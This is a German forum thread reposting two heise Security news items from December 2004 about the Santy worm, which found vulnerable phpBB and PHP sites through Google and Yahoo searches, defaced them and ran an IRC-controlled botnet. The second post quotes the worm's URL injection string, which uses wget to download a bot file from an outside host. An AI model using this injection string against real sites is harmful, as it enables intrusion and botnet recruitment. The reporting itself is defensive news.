|
Post by joggl on Dec 25, 2004 9:43:37 GMT 1
Eine neue Version des Santy-Wurms sucht jetzt bei Yahoo nach verwundbaren phpBB-Systemen. Bereits am 21.12. hatte der Santy-Wurm durch gezielte Suche bei Google mehr als 40.000 verwundbare Web-Sites aufgespürt und verunstaltet, darunter die Seiten von Softmaker, Men's Health, des Zoos München und der Zeitschrift Connect. Daraufhin hat Google die weitere Ausbreitung gestoppt, indem man die Suchanfragen des Wurms ausfilterte.
Heute erreichte heise Security ein erstes Sample, das die Suche von Yahoo nutzt, um weitere Opfer zu finden. Ein Schweizer Web-Hoster fand dieses Exemplar im /tmp-Verzeichnis eines Kunden, von wo aus es versuchte, andere Sites zu infizieren. Ob diese Wurmversion sich tatsächlich nennenswert verbreitet, ist bisher unklar. Trotzdem sollten alle Betreiber von phpBB-Systemen schnellstmöglich auf die Version 2.0.11 umstellen oder zumindest den im phpBB-Forum beschriebenen Workaround einsetzen. Denn weiter optimierte Versionen des im Quelltext verfügbaren Santy-Wurms kommen bestimmt. (ju/c't) heise online
|
|
|
Post by joggl on Dec 26, 2004 10:56:17 GMT 1
Wurm attackiert PHP-Skripte Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen. Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form: www.visualcoders.net/spy.gif?&cmd=cd /tmp;\ wget www.visualcoders.net/spybot.txt;Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server. heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten. heise online 25.12.2004 17:59
|
|